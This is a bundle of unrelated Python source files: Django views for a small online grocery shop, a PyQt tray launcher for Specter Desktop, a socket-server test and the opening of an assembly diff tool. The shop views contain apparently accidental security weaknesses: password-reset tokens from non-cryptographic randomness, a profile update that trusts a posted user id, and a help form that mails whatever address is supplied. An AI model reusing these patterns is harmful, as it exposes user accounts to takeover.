# return HttpResponse(json.dumps({'code':400,'message':'Debe esperar 5 minutos'}, cls=DjangoJSONEncoder), content_type='application/json')
# else:
# if __cache_count_error:
# if __cache_count_error == 1:
# cache.set('cache_error__%s'%__ip,1+1,60)
# return HttpResponse(json.dumps({'code':400,'message':'Segundo intento fallido'}, cls=DjangoJSONEncoder), content_type='application/json')
# elif __cache_count_error == 2:
# cache.set('cache_ip__%s'%__ip,__ip,300)
# return HttpResponse(json.dumps({'code':400,'message':'Tercer intento fallido/Debe esperar 5 minutos'}, cls=DjangoJSONEncoder), content_type='application/json')
# else:
# cache.set('cache_error__%s'%__ip,1,60)
# return HttpResponse(json.dumps({'code':400,'message':'Primer intento fallido'}, cls=DjangoJSONEncoder), content_type='application/json')
class Logout(View):
def get(self, request, *args, **kwargs):
logout(request)
_allproducts = backStart(request)
_allproducts.get('all')
data = _allproducts.response_data
data['code'] = _allproducts.code
return render(request, 'market/index.html',{'data':data['data'][0] if data['data'] else {} })
class Profile(View):
def get(self, request, *args, **kwargs):
print ("Profile")
# user creation
def post(self, request, *args, **kwargs):
_newUser = profileBackend(request)
_newUser.post()
data = _newUser.response_data
data['code'] = _newUser.code
user = authenticate(username=request.POST['email'], password=request.POST['password'])
if user:login(request, user)
return HttpResponse(json.dumps(data, cls=DjangoJSONEncoder), content_type='application/json')
def put(self, request, *args, **kwargs):
request.POST=QueryDict(request.read())
try:
data = {'code':200}
if request.POST['flagProfileonly'] == 'false':
dataUser = User.objects.get(pk=int(request.POST['user']))
dataUser.first_name=request.POST['name']
dataUser.last_name=request.POST['lastname']
dataProfile = ProfileDB.objects.get(user=dataUser.id)
dataProfile.phone=request.POST['phone']
dataProfile.rif=request.POST['rif']
dataUser.save()
dataProfile.save()
else:
dataProfile = ProfileDB.objects.get(user=User.objects.get(pk=int(request.POST['user'])))
dataProfile.direction=request.POST['direction']
dataProfile.localphone=request.POST['localphone']
dataProfile.reference=request.POST['reference']
dataProfile.save()
return HttpResponse(json.dumps(data, cls=DjangoJSONEncoder), content_type='application/json')
except Exception as e:
print (e)
data = {'code':500}
return HttpResponse(json.dumps(data, cls=DjangoJSONEncoder), content_type='application/json')
# Admin section
class ControlAdmin(View):
def get(self, request, *args, **kwargs):
if str(request.user) != 'AnonymousUser':  # logged in: show the user's data
_allproductsfilter = adminSite(request)
_allproductsfilter.dataProductUser()
data = _allproductsfilter.response_data
data['code'] = _allproductsfilter.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 10 items per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
direction = '/static/images/upload/imagesp/'
return render(request, 'market/adminGestion.html', {'direction':direction,'data':contacts,'flag':'all'})
else: # registro
return render(request, 'market/adminIndex.html', {})
# End of admin section
def Conditions(request):
return render(request, 'market/conditions.html', {})
def Help(request):
return render(request, 'market/help.html', {})
def We(request):
return render(request, 'market/we.html', {})
def Places(request):
return render(request, 'market/places.html', {})
def Payment(request):
return render(request, 'market/payment.html', {})
def Delivery(request):
return render(request, 'market/delivery.html', {})
#### SHOPPING CART ####
def CartShopping(request):
if str(request.user) != 'AnonymousUser':  # logged in: show the user's data
try:
dataUser = User.objects.get(email=request.user)
return render(request, 'market/cartshopping.html', {
'name':dataUser.first_name,
'apellido':dataUser.last_name,
'phone':dataUser.user_profile.phone,
'direction':dataUser.user_profile.direction,
'rif':dataUser.user_profile.rif,
'localphone':dataUser.user_profile.localphone,
'reference':dataUser.user_profile.reference,
'costoenvio':Tools.objects.all().first().costoenvio,
'code':200
})
except Exception as e:
print (e)
return render(request, 'market/cartshopping.html', {'costoenvio':Tools.objects.all().first().costoenvio})
else:
try:
return render(request, 'market/cartshopping.html', {'costoenvio':Tools.objects.all().first().costoenvio})
except Tools.DoesNotExist:
data = {'costoenvio':config.COSTO_ENVIO,'create_at':datetime.datetime.now()}
costo = Tools(**data)
costo.save()
return HttpResponseRedirect("/")
#Section Filters
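# The category views below all follow the same pattern: run the matching backend
# filter, paginate the results 10 per page, and render the corresponding template.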
def AllProducts(request):
_allproductsfilter = filterProducts(request)
_allproductsfilter.allProductsFilter()
data = _allproductsfilter.response_data
data['code'] = _allproductsfilter.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 10 items per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
direction = '/static/images/upload/imagesp/'
return render(request, 'market/allProducts.html',{'direction':direction,'contacts':contacts,'data':json.dumps(data['data'])})
def ViveresProducts(request):
_viveresproductsfilter = filterProducts(request)
_viveresproductsfilter.viveresProductsFilter()
data = _viveresproductsfilter.response_data
data['code'] = _viveresproductsfilter.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 10 items per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
direction = '/static/images/upload/imagesp/'
return render(request, 'market/viveresProducts.html',{'direction':direction,'contacts':contacts,'data':json.dumps(data['data'])})
def FrigorificoProducts(request):
_frigorificoproductsfilter = filterProducts(request)
_frigorificoproductsfilter.frigorificoProductsFilter()
data = _frigorificoproductsfilter.response_data
data['code'] = _frigorificoproductsfilter.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 10 items per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
direction = '/static/images/upload/imagesp/'
return render(request, 'market/frigorificoProducts.html',{'direction':direction,'contacts':contacts,'data':json.dumps(data['data'])})
def EnlatadosProducts(request):
_enlatadosproductsfilter = filterProducts(request)
_enlatadosproductsfilter.enlatadosProductsFilter()
data = _enlatadosproductsfilter.response_data
data['code'] = _enlatadosproductsfilter.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 10 items per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
direction = '/static/images/upload/imagesp/'
return render(request, 'market/enlatadosProducts.html',{'direction':direction,'contacts':contacts,'data':json.dumps(data['data'])})
# Section: product filters (admin)
def AllProductsAdmin(request):
if str(request.user) != 'AnonymousUser':  # logged in: show the user's data
_allproductsfilter = adminSite(request)
_allproductsfilter.dataProductUser()
data = _allproductsfilter.response_data
data['code'] = _allproductsfilter.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 10 items per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
direction = '/static/images/upload/imagesp/'
return render(request, 'market/adminGestion.html', {'direction':direction,'data':contacts,'flag':'all'})
else:
return render(request, 'market/adminIndex.html', {})
def ViveresProductsAdmin(request):
if str(request.user) != 'AnonymousUser':  # logged in: show the user's data
_viveresproductsfilter = adminSite(request)
_viveresproductsfilter.viveresProductsFilterAdmin()
data = _viveresproductsfilter.response_data
data['code'] = _viveresproductsfilter.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 10 items per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
direction = '/static/images/upload/imagesp/'
return render(request, 'market/adminGestion.html', {'direction':direction,'data':contacts,'flag':'vive'})
else:
return render(request, 'market/adminIndex.html', {})
def FrigorificoProductsAdmin(request):
if str(request.user) != 'AnonymousUser':  # logged in: show the user's data
_frigorificoproductsfilter = adminSite(request)
_frigorificoproductsfilter.frigorificoProductsFilterAdmin()
data = _frigorificoproductsfilter.response_data
data['code'] = _frigorificoproductsfilter.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 10 items per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
direction = '/static/images/upload/imagesp/'
return render(request, 'market/adminGestion.html', {'direction':direction,'data':contacts,'flag':'frigo'})
else:
return render(request, 'market/adminIndex.html', {})
def EnlatadosProductsAdmin(request):
if str(request.user) != 'AnonymousUser':  # logged in: show the user's data
_enlatadosproductsfilter = adminSite(request)
_enlatadosproductsfilter.enlatadosProductsFilterAdmin()
data = _enlatadosproductsfilter.response_data
data['code'] = _enlatadosproductsfilter.code
contact_list = data['cantTotal']
paginator = Paginator(contact_list, 10) # Show 10 items per page
page = request.GET.get('page')
contacts = paginator.get_page(page)
dataAll = {'contacts':contacts}
direction = '/static/images/upload/imagesp/'
return render(request, 'market/adminGestion.html', {'direction':direction,'data':contacts,'flag':'enla'})
else:
return render(request, 'market/adminIndex.html', {})
# Checkout
def CartOrder(request):
data = {}
if str(request.user) != 'AnonymousUser':  # logged in: show the user's data
try:
dataUser = User.objects.get(email=request.user)
data = {
'user':dataUser.id,
'name':dataUser.first_name,
'email':dataUser.email,
'apellido':dataUser.last_name,
'phone':dataUser.user_profile.phone,
'direction':dataUser.user_profile.direction,
'rif':dataUser.user_profile.rif,
'localphone':dataUser.user_profile.localphone,
'reference':dataUser.user_profile.reference,
'costoenvio':Tools.objects.all().first().costoenvio,
'code':200
}
except Exception as e:
print (e)
return render(request, 'market/order.html',data)
# purchase confirmation
def ConfimationOrder(request):
if str(request.user) == 'AnonymousUser':
return render(request, 'market/registerLogin.html', {})
dataUser = User.objects.get(email=request.user)
data = {
'user':dataUser.id,
'name':dataUser.first_name,
'email':dataUser.email,
'costoenvio':Tools.objects.all().first().costoenvio,
'code':200,
'compra':[],
'tipoPago':'',
}
compra = PurchaseConfirmation.objects.filter(user=dataUser).last()
allProducts = PurchaseConfirmation.objects.filter(code=compra.code)
totalGeneral=0
for value in allProducts:
data['tipoPago'] = value.payment_type
data['code'] = value.code
data['compra'].append({
'name':value.product.name,
'price':str(value.product.price)+' / '+str(value.cant_product),
'image':value.product.image,
'total':float(value.product.price)*int(value.cant_product),
})
totalGeneral = totalGeneral+(float(value.product.price)*int(value.cant_product))
data['totalGeneral'] = totalGeneral
data['totalCompleto'] = data['totalGeneral']+data['costoenvio']
return render(request, 'market/confirmationOrder.html',data)
# Help form submission
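# The mail is sent from a background thread so the HTTP response returns immediately.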
def HelpForm(request):
def hilo():
try:
msg_html = render_to_string('market/emailHelp.html',
{
'asunto':request.POST.get('asunto','') ,
'mensaje':request.POST.get('mensaje',''),
'email':request.POST.get('email','')
})
send_mail(
'Ayuda, Criollitos Market',
'formulario de ayuda',
settings.EMAIL_HOST_USER,#from
[request.POST.get('email','')],#to
html_message=msg_html,
)
except Exception as e:
print ('e',e)
thread = Thread(target = hilo)
thread.start()
data = {'code':200}
return HttpResponse(json.dumps(data, cls=DjangoJSONEncoder), content_type='application/json')
def CartOrderEntrega(request):
if str(request.user) == 'AnonymousUser':
return render(request, 'market/registerLogin.html', {})
data = {}
_allproducts = backStart(request)
_allproducts.guardaCompra()
data['code'] = _allproducts.code
if data['code'] !=500:
data = {'code':200}
else:
data = {'code':500,'message':'Error al procesar su compra'}
return HttpResponse(json.dumps(data, cls=DjangoJSONEncoder), content_type='application/json')
# password recovery page
def Restore(request):
return render(request, 'market/restore.html', {})
# send the password-recovery email
def Forgot(request):
try:
dataUser = User.objects.get(email=request.POST['email'])
######################## password-change security code ##########
def ran_gen(size, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for x in range(size))
tokenCode = ran_gen(30,"abcdefghijkLmnNopqrstuvwxyz0123456789./*-")
########################################################################
try:
token = TokenPassword.objects.get(user=dataUser)
token.token = tokenCode
except Exception as e:
dataToke = {'token':tokenCode,'user':dataUser}
token = TokenPassword(**dataToke)
token.save()
def forgotPassword():
try:
msg_html = render_to_string('market/forgotPassword.html',
{
'email':request.POST.get('email',''),
'token':tokenCode,
})
send_mail(
'Recuperar Clave',
'siga los pasos',
settings.EMAIL_HOST_USER,#from
[request.POST.get('email','')],#to
html_message=msg_html,
)
except Exception as e:
print ('e',e)
thread = Thread(target = forgotPassword)
thread.start()
data = {'code':200}
return HttpResponse(json.dumps(data, cls=DjangoJSONEncoder), content_type='application/json')
except Exception as e:
print (e)
data = {'code':500,'message':'Email no existe'}
return HttpResponse(json.dumps(data, cls=DjangoJSONEncoder), content_type='application/json')
def ForgotMail(request):
if 'token' in request.GET:
return render(request, 'market/forgotPasswordFinal.html', {'token':request.GET['token']})
else:
print ("poner un pagina de rebotado")
def Detail(request):
if 'code' in request.GET:
_detailproducts = backStart(request)
_detailproducts.detailProducts()
data = _detailproducts.response_data
return render(request, 'market/detailProduct.html', {'data':data['data'],'data2':data['data2'][0]})
else:
data = {'code':500,'message':'Codigo invalido'}
return HttpResponse(json.dumps(data, cls=DjangoJSONEncoder), content_type='application/json')
|
specter_desktop.py | from PyQt5.QtGui import QIcon, QCursor, QDesktopServices
from PyQt5.QtWidgets import (
QApplication,
QSystemTrayIcon,
QMenu,
QAction,
QDialog,
QDialogButtonBox,
QVBoxLayout,
QRadioButton,
QLineEdit,
QFileDialog,
QLabel,
QWidget,
)
from PyQt5.QtCore import (
QRunnable,
QThreadPool,
QSettings,
QUrl,
Qt,
pyqtSignal,
pyqtSlot,
QObject,
QSize,
QPoint,
QEvent,
)
from PyQt5.QtWebEngineWidgets import QWebEngineView, QWebEnginePage
import sys
import os
import subprocess
import webbrowser
import json
import platform
import time
import signal
import requests
from cryptoadvance.specter.config import DATA_FOLDER
from cryptoadvance.specter.helpers import deep_update
from cryptoadvance.specter.cli import server
import threading
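# Module-level state shared between the tray-menu callbacks and the worker threads.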
running = True
path = os.path.dirname(os.path.abspath(__file__))
is_specterd_running = False
specterd_thread = None
settings = QSettings("cryptoadvance", "specter")
wait_for_specterd_process = None
def resource_path(relative_path):
try:
base_path = sys._MEIPASS
except Exception:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
class SpecterPreferencesDialog(QDialog):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setWindowTitle("Specter Preferences")
self.layout = QVBoxLayout()
QBtn = QDialogButtonBox.Save | QDialogButtonBox.Cancel
self.buttonBox = QDialogButtonBox(QBtn)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
# Mode setting
self.mode_local = QRadioButton("Run Local Specter Server")
self.mode_local.toggled.connect(self.toggle_mode)
self.mode_remote = QRadioButton("Use a Remote Specter Server")
self.mode_remote.toggled.connect(self.toggle_mode)
self.specter_url = QLineEdit(
placeholderText="Please enter the remote Specter URL"
)
is_remote_mode = settings.value("remote_mode", defaultValue=False, type=bool)
if is_remote_mode:
self.mode_remote.setChecked(True)
else:
self.mode_local.setChecked(True)
self.specter_url.hide()
settings.setValue("remote_mode_temp", is_remote_mode)
remote_specter_url = (
settings.value("specter_url", defaultValue="", type=str)
if is_remote_mode
else ""
)
settings.setValue("specter_url_temp", remote_specter_url)
self.specter_url.setText(remote_specter_url)
self.specter_url.textChanged.connect(
lambda: settings.setValue("specter_url_temp", self.specter_url.text())
)
self.layout.addWidget(self.mode_local)
self.layout.addWidget(self.mode_remote)
self.layout.addWidget(self.specter_url)
self.layout.addWidget(self.buttonBox)
self.resize(500, 180)
self.setLayout(self.layout)
def toggle_mode(self):
if self.mode_local.isChecked():
settings.setValue("remote_mode_temp", False)
self.specter_url.hide()
else:
settings.setValue("remote_mode_temp", True)
self.specter_url.show()
# Cross communication between threads via signals
# https://www.learnpyqt.com/courses/concurrent-execution/multithreading-pyqt-applications-qthreadpool/
class ProcessSignals(QObject):
error = pyqtSignal()
result = pyqtSignal()
class ProcessRunnable(QRunnable):
def __init__(self, menu):
super().__init__()
self.menu = menu
self.signals = ProcessSignals()
@pyqtSlot()
def run(self):
menu = self.menu
start_specterd_menu = menu.actions()[0]
start_specterd_menu.setEnabled(False)
start_specterd_menu.setText(
"Starting up Specter{} daemon...".format(
" HWIBridge"
if settings.value("remote_mode", defaultValue=False, type=bool)
else ""
)
)
while running:
is_remote_mode = settings.value(
"remote_mode", defaultValue=False, type=bool
)
try:
if is_remote_mode:
requests.get(
"http://localhost:25441/hwi/settings", allow_redirects=False
)
else:
requests.get("http://localhost:25441/login", allow_redirects=False)
start_specterd_menu.setText(
"Specter{} daemon is running".format(
" HWIBridge"
if settings.value("remote_mode", defaultValue=False, type=bool)
else ""
)
)
toggle_specterd_status(menu)
self.signals.result.emit()
return
except:
pass
time.sleep(0.1)
def start(self):
QThreadPool.globalInstance().start(self)
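# Poll the local Specter daemon in a background task and open the webview once it
# starts answering HTTP requests.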
def watch_specterd(menu, view, first_time=False):
global specterd_thread, wait_for_specterd_process
try:
wait_for_specterd_process = ProcessRunnable(menu)
wait_for_specterd_process.signals.result.connect(
lambda: open_webview(view, first_time)
)
wait_for_specterd_process.signals.error.connect(lambda: print("error"))
wait_for_specterd_process.start()
except Exception as e:
print("* Failed to start Specter daemon {}".format(e))
def open_specter_window():
webbrowser.open(settings.value("specter_url", type=str), new=1)
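# Flip the tray menu between its "daemon starting/running" and "daemon stopped"
# states by enabling or disabling the relevant actions.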
def toggle_specterd_status(menu):
global is_specterd_running
start_specterd_menu = menu.actions()[0]
open_webview_menu = menu.actions()[1]
open_browser_menu = menu.actions()[2]
if is_specterd_running:
start_specterd_menu.setEnabled(False)
open_webview_menu.setEnabled(True)
open_browser_menu.setEnabled(True)
else:
start_specterd_menu.setText(
"Start Specter{} daemon".format(
" HWIBridge"
if settings.value("remote_mode", defaultValue=False, type=bool)
else ""
)
)
start_specterd_menu.setEnabled(True)
open_webview_menu.setEnabled(False)
open_browser_menu.setEnabled(False)
is_specterd_running = not is_specterd_running
def quit_specter(app):
global running
running = False
app.quit()
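# Show the preferences dialog; on save, persist the local/remote mode, normalize the
# Specter URL and make sure it is whitelisted in the HWI bridge config.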
def open_settings():
dlg = SpecterPreferencesDialog()
if dlg.exec_():
is_remote_mode = settings.value(
"remote_mode_temp", defaultValue=False, type=bool
)
settings.setValue("remote_mode", is_remote_mode)
specter_url_temp = settings.value(
"specter_url_temp", defaultValue="http://localhost:25441/", type=str
)
if not specter_url_temp.endswith("/"):
specter_url_temp += "/"
# missing schema?
if "://" not in specter_url_temp:
specter_url_temp = "http://" + specter_url_temp
settings.setValue(
"specter_url",
specter_url_temp if is_remote_mode else "http://localhost:25441/",
)
hwibridge_settings_path = os.path.join(
os.path.expanduser(DATA_FOLDER), "hwi_bridge_config.json"
)
if is_remote_mode:
config = {"whitelisted_domains": "http://127.0.0.1:25441/"}
if os.path.isfile(hwibridge_settings_path):
with open(hwibridge_settings_path, "r") as f:
file_config = json.loads(f.read())
deep_update(config, file_config)
with open(hwibridge_settings_path, "w") as f:
if "whitelisted_domains" in config:
whitelisted_domains = ""
if specter_url_temp not in config["whitelisted_domains"].split():
config["whitelisted_domains"] += " " + specter_url_temp
for url in config["whitelisted_domains"].split():
if not url.endswith("/") and url != "*":
# make sure the url end with a "/"
url += "/"
whitelisted_domains += url.strip() + "\n"
config["whitelisted_domains"] = whitelisted_domains
f.write(json.dumps(config, indent=4))
# TODO: Add PORT setting
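# Open the configured Specter URL, either in the embedded webview or, for
# https:// and .onion URLs, in the default browser.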
def open_webview(view, first_time=False):
url = settings.value("specter_url", type=str).strip("/")
if first_time and settings.value("remote_mode", defaultValue=False, type=bool):
url += "/settings/hwi"
# missing schema?
if "://" not in url:
url = "http://" + url
# if https:// or .onion - use browser
if "https://" in url or ".onion" in url:
webbrowser.open(settings.value("specter_url", type=str), new=1)
return
if not view.isVisible():
view.load(QUrl(url))
view.show()
# if the window is already open just bring it to top
# hack to make it pop-up
else:
view.show()
getattr(view, "raise")()
view.activateWindow()
class WebEnginePage(QWebEnginePage):
"""Web page"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.featurePermissionRequested.connect(self.onFeaturePermissionRequested)
self.profile().downloadRequested.connect(self.onDownloadRequest)
def onFeaturePermissionRequested(self, url, feature):
"""Enable camera and other stuff"""
# allow everything
self.setFeaturePermission(url, feature, QWebEnginePage.PermissionGrantedByUser)
def onDownloadRequest(self, item):
"""Catch dowload files requests"""
options = QFileDialog.Options()
path = QFileDialog.getSaveFileName(
None, "Where to save?", item.path(), options=options
)[0]
if path:
item.setPath(path)
item.accept()
def createWindow(self, _type):
"""
Catch clicks on _blank urls
and open it in default browser
"""
page = WebEnginePage(self)
page.urlChanged.connect(self.open_browser)
return page
def open_browser(self, url):
page = self.sender()
QDesktopServices.openUrl(url)
page.deleteLater()
class WebView(QWidget):
"""Window with the web browser"""
def __init__(self, tray, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setStyleSheet("background-color:#263044;")
self.tray = tray
self.browser = QWebEngineView()
self.browser.page = WebEnginePage()
self.browser.setPage(self.browser.page)
# loading progress widget
self.progress = QWidget()
self.progress.setFixedHeight(1)
self.progress.setStyleSheet("background-color:#263044;")
vbox = QVBoxLayout()
vbox.addWidget(self.progress, stretch=0)
vbox.addWidget(self.browser)
vbox.setSpacing(0)
vbox.setContentsMargins(0, 0, 0, 0)
self.setLayout(vbox)
self.resize(settings.value("size", QSize(1200, 900)))
self.move(settings.value("pos", QPoint(50, 50)))
self.browser.loadStarted.connect(self.loadStartedHandler)
self.browser.loadProgress.connect(self.loadProgressHandler)
self.browser.loadFinished.connect(self.loadFinishedHandler)
self.browser.urlChanged.connect(self.loadFinishedHandler)
self.setWindowTitle("Specter Desktop")
def load(self, *args, **kwargs):
self.browser.load(*args, **kwargs)
def loadStartedHandler(self):
"""Set waiting cursor when the page is loading"""
QApplication.setOverrideCursor(QCursor(Qt.WaitCursor))
def loadProgressHandler(self, progress):
# just changes opacity over time for now
alpha = int(time.time() * 100) % 100
self.progress.setStyleSheet(f"background-color:rgba(75,140,26,{alpha});")
def loadFinishedHandler(self, *args, **kwargs):
"""Recover cursor when done"""
self.progress.setStyleSheet("background-color:#263044;")
QApplication.restoreOverrideCursor()
def closeEvent(self, *args, **kwargs):
"""
Notify about tray app when window is closed
for the first time.
Also save geometry of the window.
"""
settings.setValue("size", self.size())
settings.setValue("pos", self.pos())
if settings.value("first_time_close", defaultValue=True, type=bool):
settings.setValue("first_time_close", False)
self.tray.showMessage(
"Specter is still running!",
"Use tray icon to quit or reopen",
self.tray.icon(),
)
super().closeEvent(*args, **kwargs)
class Application(QApplication):
def event(self, event):
# 20 is QEvent.Quit
if event and event.type() in [QEvent.Close, 20]:
quit_specter(self)
return False
return super().event(event)
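# Build the tray icon and menu, start the specterd server thread, and enter the Qt
# event loop.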
def init_desktop_app():
app = Application([])
app.setQuitOnLastWindowClosed(False)
def sigint_handler(*args):
"""Handler for the SIGINT signal."""
quit_specter(app)
# fix termination ctrl+c
signal.signal(signal.SIGINT, sigint_handler)
# This is the place to uncomment if we ever have issues like
# https://github.com/cryptoadvance/specter-desktop/issues/373 again
# So maybe let's keep it in here.
if os.environ.get("DEP_REPORTING"):
import psutil
print(
"---------------------------DEP_REPORTING--------------------------------------------"
)
for item in psutil.Process().memory_maps():
print(item.path)
print(
"-----------------------------DEP_REPORTING(end)-------------------------------------"
)
# Create the icon
icon = QIcon(os.path.join(resource_path("icons"), "icon.png"))
# Create the tray
tray = QSystemTrayIcon()
tray.setIcon(icon)
tray.setVisible(True)
# Create webview
view = WebView(tray)
# Create the menu
menu = QMenu()
start_specterd_menu = QAction(
"Start Specter{} daemon".format(
" HWIBridge"
if settings.value("remote_mode", defaultValue=False, type=bool)
else ""
)
)
start_specterd_menu.triggered.connect(lambda: watch_specterd(menu, view))
menu.addAction(start_specterd_menu)
open_webview_menu = QAction("Open Specter App")
open_webview_menu.triggered.connect(lambda: open_webview(view))
menu.addAction(open_webview_menu)
open_specter_menu = QAction("Open in the browser")
open_specter_menu.triggered.connect(open_specter_window)
menu.addAction(open_specter_menu)
toggle_specterd_status(menu)
open_settings_menu = QAction("Preferences")
open_settings_menu.triggered.connect(open_settings)
menu.addAction(open_settings_menu)
# Add a Quit option to the menu.
quit = QAction("Quit")
quit.triggered.connect(lambda: quit_specter(app))
menu.addAction(quit)
# Add the menu to the tray
tray.setContextMenu(menu)
app.setWindowIcon(icon)
# Setup settings
first_time = settings.value("first_time", defaultValue=True, type=bool)
if first_time:
settings.setValue("first_time", False)
settings.setValue("remote_mode", False)
settings.setValue("specter_url", "http://localhost:25441/")
open_settings()
# start server
global specterd_thread
# add hwibridge to args
if settings.value("remote_mode", defaultValue=False, type=bool):
sys.argv.append("--hwibridge")
# start thread
specterd_thread = threading.Thread(target=server)
specterd_thread.daemon = True
specterd_thread.start()
watch_specterd(menu, view)
sys.exit(app.exec_())
if __name__ == "__main__":
init_desktop_app()
|
test_serverapp.py | import sys
sys.path.append("yam")
sys.path.append("../../yam")
from serverapp import YamTcpServer
from devices import DeviceWatcher
from player import RemoteClient
import config
import serverapp
import time
import SocketServer
import threading
request_received = False
answer = None
tcpServer = None
tcpServerReallyBroadcastedItsPresence = False
class TestServerApp:
config.setConfigFolder('tests/config/')
request_received_confirmed = False
def test_server_default_setup(self):
server = serverapp.setupTestServer()
global tcpServer
tcpServer = server
t = threading.Thread(target=self.send_requests_and_quit, name="reqsender")
t.start()
watcher = DeviceWatcher(callback=self.device_watcher_callback)
watcher.start()
tcpServer.start()
watcher.stop()
global tcpServerReallyBroadcastedItsPresence
assert tcpServerReallyBroadcastedItsPresence
def send_requests_and_quit(self):
time.sleep(1)
global tcpServer
ip, port = tcpServer.tcpServer.server_address
self.requestSender = RemoteClient("{0}:{1}".format(ip, port), callback=self.on_request_callback)
self.request = "player;getState\n"
self.requestSender.sendRequest(self.request)
return
def on_request_callback(self, answer):
global tcpServer
assert answer and len(answer) > 0 and answer == "STOPPED"
tcpServer.stop()
def device_watcher_callback(self, device):
global tcpServerReallyBroadcastedItsPresence
tcpServerReallyBroadcastedItsPresence = True
global tcpServer
assert tcpServer.device == device
|
diff.py | #!/usr/bin/env python3
# PYTHON_ARGCOMPLETE_OK
import argparse
import sys
from typing import (
Any,
Callable,
Dict,
Iterator,
List,
Match,
NoReturn,
Optional,
Pattern,
Set,
Tuple,
Type,
Union,
)
def fail(msg: str) -> NoReturn:
print(msg, file=sys.stderr)
sys.exit(1)
def static_assert_unreachable(x: NoReturn) -> NoReturn:
raise Exception("Unreachable! " + repr(x))
# ==== COMMAND-LINE ====
if __name__ == "__main__":
# Prefer to use diff_settings.py from the current working directory
sys.path.insert(0, ".")
try:
import diff_settings
except ModuleNotFoundError:
fail("Unable to find diff_settings.py in the same directory.")
sys.path.pop(0)
try:
import argcomplete
except ModuleNotFoundError:
argcomplete = None
parser = argparse.ArgumentParser(
description="Diff MIPS, PPC, AArch64, or ARM32 assembly."
)
start_argument = parser.add_argument(
"start",
help="Function name or address to start diffing from.",
)
if argcomplete:
def complete_symbol(
prefix: str, parsed_args: argparse.Namespace, **kwargs: object
) -> List[str]:
if not prefix or prefix.startswith("-"):
# skip reading the map file, which would
# result in a lot of useless completions
return []
config: Dict[str, Any] = {}
diff_settings.apply(config, parsed_args) # type: ignore
mapfile = config.get("mapfile")
if not mapfile:
return []
completes = []
with open(mapfile) as f:
data = f.read()
# assume symbols are prefixed by a space character
search = f" {prefix}"
pos = data.find(search)
while pos != -1:
# skip the space character in the search string
pos += 1
# assume symbols are suffixed by either a space
# character or a (unix-style) line return
spacePos = data.find(" ", pos)
lineReturnPos = data.find("\n", pos)
if lineReturnPos == -1:
endPos = spacePos
elif spacePos == -1:
endPos = lineReturnPos
else:
endPos = min(spacePos, lineReturnPos)
if endPos == -1:
match = data[pos:]
pos = -1
else:
match = data[pos:endPos]
pos = data.find(search, endPos)
completes.append(match)
return completes
setattr(start_argument, "completer", complete_symbol)
parser.add_argument(
"end",
nargs="?",
help="Address to end diff at.",
)
parser.add_argument(
"-o",
dest="diff_obj",
action="store_true",
help="""Diff .o files rather than a whole binary. This makes it possible to
see symbol names. (Recommended)""",
)
parser.add_argument(
"-e",
"--elf",
dest="diff_elf_symbol",
metavar="SYMBOL",
help="""Diff a given function in two ELFs, one being stripped and the other
one non-stripped. Requires objdump from binutils 2.33+.""",
)
parser.add_argument(
"-c",
"--source",
dest="show_source",
action="store_true",
help="Show source code (if possible). Only works with -o or -e.",
)
parser.add_argument(
"-C",
"--source-old-binutils",
dest="source_old_binutils",
action="store_true",
help="""Tweak --source handling to make it work with binutils < 2.33.
Implies --source.""",
)
parser.add_argument(
"-L",
"--line-numbers",
dest="show_line_numbers",
action="store_const",
const=True,
help="""Show source line numbers in output, when available. May be enabled by
default depending on diff_settings.py.""",
)
parser.add_argument(
"--no-line-numbers",
dest="show_line_numbers",
action="store_const",
const=False,
help="Hide source line numbers in output.",
)
parser.add_argument(
"--inlines",
dest="inlines",
action="store_true",
help="Show inline function calls (if possible). Only works with -o or -e.",
)
parser.add_argument(
"--base-asm",
dest="base_asm",
metavar="FILE",
help="Read assembly from given file instead of configured base img.",
)
parser.add_argument(
"--write-asm",
dest="write_asm",
metavar="FILE",
help="Write the current assembly output to file, e.g. for use with --base-asm.",
)
parser.add_argument(
"-m",
"--make",
dest="make",
action="store_true",
help="Automatically run 'make' on the .o file or binary before diffing.",
)
parser.add_argument(
"-l",
"--skip-lines",
dest="skip_lines",
metavar="LINES",
type=int,
default=0,
help="Skip the first LINES lines of output.",
)
parser.add_argument(
"-s",
"--stop-jr-ra",
dest="stop_jrra",
action="store_true",
help="""Stop disassembling at the first 'jr ra'. Some functions have
multiple return points, so use with care!""",
)
parser.add_argument(
"-i",
"--ignore-large-imms",
dest="ignore_large_imms",
action="store_true",
help="Pretend all large enough immediates are the same.",
)
parser.add_argument(
"-I",
"--ignore-addr-diffs",
dest="ignore_addr_diffs",
action="store_true",
help="Ignore address differences. Currently only affects AArch64 and ARM32.",
)
parser.add_argument(
"-B",
"--no-show-branches",
dest="show_branches",
action="store_false",
help="Don't visualize branches/branch targets.",
)
parser.add_argument(
"-S",
"--base-shift",
dest="base_shift",
metavar="N",
type=str,
default="0",
help="""Diff position N in our img against position N + shift in the base img.
Arithmetic is allowed, so e.g. |-S "0x1234 - 0x4321"| is a reasonable
flag to pass if it is known that position 0x1234 in the base img syncs
